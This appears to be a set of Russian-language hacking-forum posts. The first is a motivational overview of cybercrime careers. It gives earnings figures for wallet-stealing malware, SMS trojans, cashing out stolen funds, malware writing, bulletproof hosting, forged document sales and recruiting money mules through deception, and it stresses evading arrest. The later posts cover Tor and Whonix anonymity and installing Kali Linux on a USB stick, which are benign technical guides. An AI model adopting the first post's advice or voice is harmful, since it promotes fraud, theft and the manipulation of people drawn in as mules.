Все начинается с простого баловства - снятие фэйком паролей, подкидывание коника ламеру, дефейс сайта надписью "H4ck3d by [email protected]<script data-cfhash='f9e31' type="text/javascript">/* */</script>_ник"... Но потом ты начинаешь понимать, что к чему, ты начинаешь потихоньку видеть картину в общем. В какой-то момент у тебя будут появляться в голове свои идеи схем по срубливанию капусты: ты будешь чувствовать свои пробелы в знаниях и будешь самообучаться необходимым технологиям, общаться с людьми, тусовать на хак-форумах. И когда-то ты сделаешь первый шаг (он обычно начинается с объявлений в разделах на хакерском форуме). В начале будет сложно, все будет противодействовать тебе (антивирусные индустрии тоже не дремлят!). Поработав годы в своей выбранной теме, ты постепенно станешь гуру. У тебя будет очень много активов, уже не ты будешь гнаться за деньгами, а деньги сами будут приходить к тебе. Главное - не бросать, стабильно двигаться к своей цели. Бросать нужно лишь в том случае, когда тема, которой ты заинтересовался, действительно не принесет никаких денег (ты все просчитал, продумал, и разочаровался). А самое главное - это не попасться. Свобода - дороже всяких денег. Когда небо в клеточку, и дурзья в полосочку, уже никакие деньги радовать не будут. Прямое воровство средств со счетов В сети есть множество малвари, которая при правильном обращении приносит очень хорошие деньги. В частности, когда юзер заражается вирусом, у него с WebMoney крадётся N-ая сумма денег и переводится на другой кошелёк. Так же в сети медленно зараждается тема трояна, отправляющего смс на платные номера с usb-модемов. Такой бизнес может запросто приносить от 1500$ в сутки при минимальных затратах. Заливы на различные реквизиты Допустим у вас есть ботнет, очень много ботов, налитых с биз трафа. Соответственно бут много аккаунтов на платёжные системы, но сливать деньги самому - уйдёт много времени, к тому же и умеют это не многие. В основном в подобных ситуациях люди ищут партнёра, который и занимается выводом средств. Это называется залив - за определённый процент, человек обналичивает сумму денег и переводи большую их часть заливщику. Так же можно увидеть объявления по заливам, это стоит воспринимать несколько иначе. Человек просто переводит средства вам на счёт за 50% от их ценности. Платите вы перед заливкой средств. Вирусмейкерство Вирусмейкер - человек, который пишет вредоносное ПО (трояны, руткитные шапки, крипторы etc). Зароботок подобных специалистов порядка 4.000$-10.000$ Пассивный хакинг К пассивному хакингу я отношу такие темы: Продажа хостинга, находящегося в оффшорных зонах - абузоустойчивый хостинг Продажа Socks 4\5 Продажа Proxy-серверов Продажа Dedicatied серверов Вся эта мелочь может приносить до 2000$ ежемесячно! При том такие люди в основном реселлеры и отследить их не представляется возможным. Таким образом они часто остаются в тени. Продажа опыта Множество людей в сети продают курсы\пособия, проводят вебинары на различные темы и т.д. Эти люди продают вам свой опыт. Допустим вы хотите чему-то научится, на самообразование уйдёт слишком много времени, а поучаствовав в каком либо вебинаре вы сразу выйдете на уровень не ниже среднего. Стоимость вебинаров я называть не буду, она различна везде. Докерство Докеры - селлеры, которые торгуют документами. Продвинутый докер запросто оформит вам ИП\ЧП, может сделать визу в любую страну, предоставит офшорный счёт в забугорном банке или даже сможет предоставить целую офшорную фирму! Всё зависит от вашего размера кошелька. Сколько они зарабатывают знают только они сами. К примеру скан комплекта доков (главная страница паспорта и прописки, справка о доходах, ИНН, мед. полис, вод. права) стоит порядка 200-250$. Офшорная фирма на сейшельских островах стоит 50.000р. А ИП\ЧП вам обойдётся в 400$. Докерство довольно прибыльный бизнес, однако нужно имень много документов для старта, а для их сборки нужны каналы... Дроповодство Дроповод - человек или женщина, которые разводят дропов (номиналов) Дроп - человек, который либо в ясном уме становится дропом, что бы принимать участие в не совсем законных делах, либо ввергается туда путем СИ, развода, или укрывательства неких деталей того, во что он будет замешан. Дроповоды как правило люди умные, и имеют отличные навыки в шпионаже, психологии общения, обольщения и промывки мозгов. Разводят они дропов под некоторые из следующих тем: Сервис номинальных директоров (номиналов) Заливы, принятие стаффа, открытия счетов в банках Оформления на себя какого-либо имущества, банковских карт, аккаунтов Вешания кредитов, авто-кредитов и ипотек Это некоторая часть направлений дроповодов. Дроповоды универсалы (те, кто разводит дропов под любые цели, и которые имеют в своей базе более 1000 дропов) - найти такого дроповода, есть большая редкость. Как правило они работают с определенным кругом частых "покупателей" Хороший дроповод, имеющий в своей коллекции скажем 30 не разводных и 20 разводных дропов, сможет зарабатывать в месяц от $3000 минимум (при хорошем рынке, и лишь предоставляя их под конкретное направление) Дроповод-универсал, предоставляющий дропов под любые нужны в разных странах зарабатывает около $30.000 в месяц и более.
  14. Все наши подписчики знают, как важно пользоваться сетью Tor при сёрфинге и поэтому используют Tor Browser Bundle. При помощи TBB мы не только выходим в сеть через Tor, посещаем onion сайты, скрывая наши реальные IP, но также используем множество встроенных плагинов для повышения нашей анонимности (например, HTTPS Everywhere и NoScript). Почему бы не использовать все эти инструменты при любом действии на нашем компьютере, пропуская весь трафик через сеть Tor? Маршрутизация всего трафика через TOR: это правда так замечательно? Мы хотели бы, чтобы все наши программы использовали сеть Tor для скрытия нашего IP-адреса, когда мы пользуемся почтой или качаем фильм с торрента. Но так ли это просто? Правда в том, что это крайне не рекомендуется разработчиками Tor. Применение стратегии "всё в одном", при которой весь трафик пропускается через Tor, не исключает неправильного поведения некоторых программ с небезопасными настройками или протоколами, которые повлекут за собой раскрытие IP-адреса. Известный пример такого события описывается разработчиками torproject в документе о BitTorrent. Говоря простыми словами, клиенты BitTorrent, такие как uTorrent, просто игнорируют настройки прокси, если мы настраиваем подключение через Tor. Фактически Tor поддерживает TCP, пока торрент-трекер работает через UDP, поэтому для uTorrent невозможно использовать эти настройки. Результатом будет раскрытие IP-адреса. Таким образом, использование Bittorrent через Tor это глупая идея, но как насчет других программ? Дело в том, что каждое приложение ведет себя по-разному с разными настройками, поэтому глупо ожидать, что все приложения будут стараться защитить вашу анонимность. Тем ни менее, во многих продуктах реализована возможность маршрутизации трафика через Tor (например, Mozilla Thunderbird) с плагином TorBirdy. Изучите вопрос подробней, чтоб выбрать подходящий инструмент именно для вас. Ели вы все еще хотите найти способ пропустить весь ваш трафик через Tor, то torproject имеет две различные реализации этой затеи: Прозрачная маршрутизация трафика через Tor Изолированный Proxy Прозрачная маршрутизация всего трафика через Tor Прокси-сервер называется «прозрачным», когда клиенты не осознают, что их трафик проходит через прокси. В любом случае сервер знает, что запросы поступают из прокси. Обычно недостаточно просто настроить сервера SOCKS, поэтому вы должны настроить каждое приложение для подключения через прокси-сервер, но все же не все существующие приложения позволяют подключаться через SOCKS. Кроме того, если вы являетесь сетевым администратором, вы можете пожелать, чтоб пользователи не знали, что они используют такой прокси. Этих проблем можно избежать, используя прозрачный прокси для маршрутизации всего трафика. Tor имеет функции прозрачности, которые мы можем использовать, как прозрачный прокси, но существует много проблем с утечками разного типа. Поэтому рекомендуемым решением является изолированный прокси. Изолированный прокси: как это работает? Изолированный прокси решает проблему утечек путем изоляции. Это решение требует двух физических или виртуальных машин, одна из которых «Шлюз», а вторая - «Рабочая станция». Шлюз имеет только два интерфейса: один подключен к Clearnet, а другой подключен к рабочей станции через кабель LAN. Tor может работать как через первый интерфейс, так и через второй. Рабочая станция полностью изолирована и используется только для запуска приложений, таких как Tor Browser Bundle или Hexchat, соединённая с шлюзом через порт SOCKS. Эта система защитит вас от вирусов, которые могут сделать ваш компьютер частью ботнет сети, от утечек DNS и IP. WHONIX Whonix - лучшая из существующих реализация концепции изолированного прокси. Whonix - это бесплатная ОС на базе Debian, специально разработанная для защиты вашей конфиденциальности методом маршрутизации всего трафика через Tor или блокируя его. Whonix запускается внутри нескольких виртуальных машин, а все приложения, которые могут вам понадобиться, уже установлены и настроены для работы через Tor. Утечки DNS невозможны, так же, как и утечки IP. Установленный SocksPort защищает анонимность пользователя путём подключения каждого приложения через отдельный Tor SocksPort, в то время, как при обычном использовании все приложения одновременно выходят в сеть через одну ноду. Whonix может быть использован с Qubes OS для работы с наивысшей степенью анонимности, но так же будет работать и в Linux, Windows и OS X. В заключение подрезюмирую, что существуют инструменты, которые будут обещать вам маршрутизировать весь ваш трафик через Tor. Такие встроенные инструменты (чаще всего написанные под Windows) НЕ НАДЁЖНЫ Единственная существующая надёжная система - это Whonix внутри Qubes.
  15. Если вам хочется иметь портативную флэшку или внешний жёсткий диск с Kali Linux>, то имеется, как минимум, два варианта: установить систему на флэшку создать флэшку с persistent (постоянным хранилищем) Первый вариант похож на обычную установку операционной системы. Но поскольку мы будем устанавливать на флэшку, то получаем портативность – возможность загрузиться на любом компьютере с USB входом. Все изменения, сделанные в системе, сохраняются после перезагрузки. В целом, работа мало чем отличается от работы с обычным компьютером. Второй вариант заключается в создании Live системы на USB носителе (той же самой флэшке). Но поскольку Live система не способна сохранять изменения (пользовательские файлы, настройки системы), для неё дополнительно создаётся ещё один раздел, на который сохраняются файлы и сделанные настройки. Т.е., казалось бы, получается примерно как в первом варианте – имеется система, которая «помнит» сделанные изменения после перезапуска. На самом деле, есть некоторые нюансы. Live система с persistent сама по себе занимает меньше места – столько же, сколько скаченный ISO образ – т.е. обычно до четырёх гигабайт. Операционная система, установленная обычным образом, занимает около 13-15 гигабайт. Зато установленная обычным образом система быстрее загружается, поскольку в Live используется сжатие. Live система с persistent может столкнуться с проблемой, когда новое ядро (которое возможно обновить), будет несовместимо со старым загрузчиком (который является частью Live образа и не обновляется). В целом, оба способа заслуживают право на существование, и они оба будут рассмотрены на страницах HackWare.ru. В этой инструкции будет показано, как создать флэшку с установленной Kali Linux. Будет описан подробный порядок действий, позволяющий избежать некоторых проблем, которые могут возникнуть при установке системы на USB носитель или при загрузке с USB флэшки или внешнего диска. Инструкция по установке Kali Linux на USB карту памяти Установка на USB флэшку похожа на установку на внутренний диск. Но чтобы случайным образом не повредить основную систему компьютера, жёсткие диски компьютера или загрузчик основной системы, я предлагаю сделать установку Kali Linux на USB флэшку в виртуальном компьютере. После окончания этой установки вы сможете в вашем реальном компьютере загрузиться с этой флэшки. В качестве виртуального компьютера я использую VirtualBox. Я исхожу из того, что VirtualBox у вас уже установлен, или вы сами знаете, как его установить. В VirtualBox создайте новый виртуальный компьютер. Самый обычный виртуальный компьютер для Linux. Единственное отличие – у него не должно быть (виртуального) жёсткого диска. Когда в процессе создания нового виртуального компьютера дойдёте до окна Жёсткий диск, то выберите «Не подключать виртуальный жёсткий диск»: Когда виртуальная машина создана, запустите её. В качестве ISO рекомендуются официальные выпуски (а не еженедельные автоматические сборки). При попытке использовать еженедельные сборки у меня появлялись ошибки, связанные с невозможностью загрузить модули ядра, и установка завершалась неудачей. USB флэшка для Kali Linux Для Kali Linux, а также для любого современного дистрибутива Linux я рекомендую карты памяти объёмом более 16 гигабайт. Т.е. это 32 гигабайта или больше. Чем выше скорость – тем лучше. Флэшки плохо подходят для нескольких одновременных операций чтения/записи, а операционные системы работают именно в таком режиме. Даже с хорошей картой памяти ваша система будет работать заметно медленнее настольной, она может «лагать», «тормозить». С плохой (медленной) картой памятью работа может стать затруднительной, некомфортной. Сколько живут USB флэшки с установленной операционной системой Я из тех, кто не щадит свои медиа носители. На мои карты памяти в телефоне я скачиваю торренты, на свои USB флэшки я устанавливаю операционные системы, интенсивно их использую, часто делаю и восстанавливаю полные резервные копии. У меня не сломалось ни одной карты памяти/USB от интенсивного использования. Честно говоря, я считаю мифом рассказы, что карты памяти могут испортиться из-за частого использования. Возможно мне просто везёт. Я хочу сказать, что USB флэшки (по крайней мере некоторые) способны годами «жить» и использоваться с установленной на них операционными системами. Очистка USB карты памяти для установки операционной системы Перед началом установки я рекомендую полностью стереть данные с флэшки (удалить GPT), поскольку в противном случае у меня иногда возникали ошибки с проблемой записи на диск. Это мы сделаем силами самой Live системы, загрузившись со скаченного ISO. Когда появится это меню, вместо выбора пункта «Графическая установка», загрузитесь в систему. Когда загрузитесь в нижнем баре виртуальной машины подключите вашу USB флэшку к системе: Вы можете посмотреть список дисков, но поскольку каких-либо других носителей (жёстких дисков), там нет, то вы увидите только флэшку под именем /dev/sda: 1 fdisk -l Для удаления GPT с диска, если она там есть, выполните: 1 gdisk /dev/sda Для перехода в экспертный режим там введите 1 x Затем для удаления GPT введите 1 z Дважды согласитесь, чтобы полностью очистить диск. Теперь наша флэшка очищена, не вынимая её, перезагрузите виртуальную систему. Теперь в меню выберите «Graphical install»: Инструкция по установке Kali Linux на карту памяти Каких-либо отличий от установки операционной системы нет – всё достаточно стандартно, выбор языка, имени пользователя и т.к. Если у вас с этим проблемы, то, опять же, обратитесь к заметке «Установка Kali Linux». Пожалуй, имеется только небольшой нюанс с разделом подкачки. Нам совершенно не нужен раздел подкачки на флэшке – мы будем использовать ресурсы компьютера напрямую, т.е. всю оперативную память – этого должно хватить сполна. Но даже если это не так, от раздела подкачки на флэшке будет только вред, поскольку он будет очень медленным. Чтобы не допустить создание раздела подкачки, то при переходе к «Разметке дисков» выберите пункт «Вручную»: Выбираете раздел: Выбираете «Да»: Выбираете «СВОБОДНОЕ МЕСТО»: Далее «Создать новый раздел»: В следующем окне, скорее всего, не придётся ничего менять: Выбираете «Первичный»: Выберите «Настройка раздела закончена»: Выбираете «Закончить разметку и записать изменения на диск»: Система жалуется, что не указан ни одни раздел для пространства подкачки и всячески его нахваливает. В нашем случае (установка ОС на флэшку), он действительно не нужен. Выбираем «Нет»: Теперь выбираем «Да»: После этого начнётся обычная установка ОС Kali Linux. Здесь оставьте без изменений: Выберите вашу флэшку: Когда установка закончится (а это может занять больше времени, чем вы ожидали, посколкьу флэшки не такие быстрые как даже обычные жёсткие диски, не говоря об SSD), то отключите виртуальный компьютер. Вы можете перезагрузить ваш реальный компьютер, чтобы загрузиться со свежеустановленной на USB флэшку системы. Загрузка Kali Linux с флэшки Если у вас нет UEFI, то при начале загрузки компьютера нажимайте много раз кнопку Delete или Esc (иногда другую — в зависимости от модели материнской платы — это можно узнать у Гугла). В БИОСе, там где «Порядок загрузки» выберите вашу флэшку. Флэшка в этот момент должна быть вставлена в компьютер, иначе БИОС её не увидит. Если флэшка вставлена, но компьютер её не видит, попробуйте вставлять её в разные гнёзда и каждый раз перезагружайтесь и переходите в БИОС. Если у вас UEFI, то просто так не попадёшь в БИОС. Самый простой способ попасть в БИОС — это ввести в командной строке (от имени администратора): 1 shutdown.exe /r /o После этого появится сообщение, что компьютер перезагрузится менее чем через одну минуту. После перезагрузки попадаем сюда и выбираем «Диагностика»: Теперь выбираем «Дополнительные параметры»: Теперь «Параметры встроенного ПО UEFI»: Ну и «Перезагрузить»: У разных производителей разные БИОСы, поэтому у вас может быть по-другому. Но я покажу на пример своего ноута, чтобы была понятна суть. Переходим во вкладку Boot, там выбираем Boot Option Priorities, смотрим какие там есть варианты: Всего один вариант и точно нет моей флэшки. Ищем Secure Boot и отключаем (Disable): Появляется новый пункт меню OS Mode Selection. В нём выбираем CMS and UEFI OS. Если выбрать только CMS OS, то установленный Windows не будет загружаться. Теперь ищем такой пункт как Fast BIOS Mode и отключаем его (Disable). Это нужно для того, чтобы при загрузке БИОС начал проверять наличие USB устройств: Настало время сохранить изменения и перезагрузится: Но нам опять нужно в БИОС! Поэтому при загрузке нажимаете соответствующую клавишу. У меня эта клавиша — F2. На старом компьютере этой клавишей была Delete. Эту клавишу БИОС сам пишет при загрузке компьютера. Если вы не успеваете посмотреть или не понимаете английский, то посмотрите для вашей модели в Гугле. Либо пробуйте методом перебора. Кроме названных, ещё этой клавишей может быть Esc или какая либо F*. Опять переходите во кладку Boot Option Priorities. Теперь там появилась флэшка. Если вы сделаете как я — на первое место поставите флэшку, а на второе — Windows Boot Manager, то добьётесь следующего эффекта: если флэшка вставлена в компьютер, то будет загружаться Linux с этой флэшки. Если флэшки нет, то загрузится Windows — и не надо лишний раз лезть в БИОС! Не забываем сохранится и перезагружаемся. Решение проблемы «the disc contains an unclean file system» При загрузке Linux вы можете столкнуться с ошибкой: 1 The disc contains an unclean file system (0, 0) Особенно часто эта ошибка появляется при попытке загрузиться с USB флэшки или с внешнего диска. Причина её в том, что настройки GRUB указывают на неверный диск, например, на диск Windows. Система не понимает файловую систему диска и не может продолжить загрузку. Эта проблема решается достаточно просто. Перезагрузите компьютер, и когда появится меню загрузчика GRUB нажмите клавишу e. Вы увидите примерно следующее: Обратите внимание на строку, начинающуюся с linux. В моём случае там присутствует запись 1 root=/dev/sda1 Поскольку при установке в виртуальном компьютере кроме флэшки не было других носителей информации, то ей было присвоено имя /dev/sda1. В реальном компьютере имеется ещё минимум один жёсткий диск, и имя /dev/sda1 могло быть присвоено ему. А флэшка, с которого я пытаюсь загрузиться, теперь имеет другое имя. Этим именем может быть /dev/sdb1, или, /dev/sdc1 или другое (в зависимости от количества дисков в системе). Если вы не знаете новое имя, то просто перебирайте разные варианты. Переместите курсор на имя диска и поменяйте его на /dev/sdb1. После этого нажмите клавишу F10 и дождитесь загрузки. Если загрузка неудачная, то перезапустите компьютер и поменяйте запись на /dev/sdс1 (и так далее по алфавиту), нажмите F10 и проверьте успешность загрузки. После успешной загрузки в систему поменяйте имя загружаемого диска. Например, в моём случае имя диска оказалось /dev/sdс1 (с буквой c). Тогда команда для изменения загрузочного диска будет выглядеть так: 1 2 sudo grub-install --recheck /dev/sdc sudo grub-mkconfig -o /boot/grub/grub.cfg Вместо /dev/sdc подставьте имя вашего диска или флэшки. Теперь при перезагрузке не будет возникать ошибка, а я сразу будут попадать в Kali Linux, установленную на флэшку. Создание резервной копии флэшки с Kali Linux Установка операционной системы на флэшку, а в особенности её последующая настройка и установка программ – это длительный процесс. На тот случай, если флэшка всё-таки сломается или она вам понадобиться, чтобы записать курсовую работу, вы можете сделать её резервную копию. Также рекомендуется делать резервные копии перед установкой видео драйверов или других подобных опасных для ОС экспериментах. Если мы говорим о создании резервной копии ОС, а не отдельных файлов, то лучшим вариантом является клонирование образа всего диска. В случае необходимости это позволит очень быстро вернуть всю операционную систему со всеми настройками. Минусом такого метода является то, что образ с резервной копией будет занимать ровно столько место, какой объём имеет флэшка. Даже если, например, операционная система со всеми файлами занимает только половину объёма USB носителя, то образ будет всё равно объёмом с флэшку. Как уже было сказано, плюсом является то, что не нужно выбирать файлы для синхронизации, вся резервная копия хранится в виде одного файла, восстановление гарантирует полный возврат в исходное состояние. В системах Linux подобный образ можно сделать с помощью программы dd, а для Windows имеется замечательная бесплатная, с открытым исходным кодом утилита Win32 Disk Imager. Запустите Win32 Disk Imager, в качестве Device выберите вашу флэшку, а в поле Image File пропишите путь, куда вы хотите сохранить образ: Когда всё готово, нажмите Read.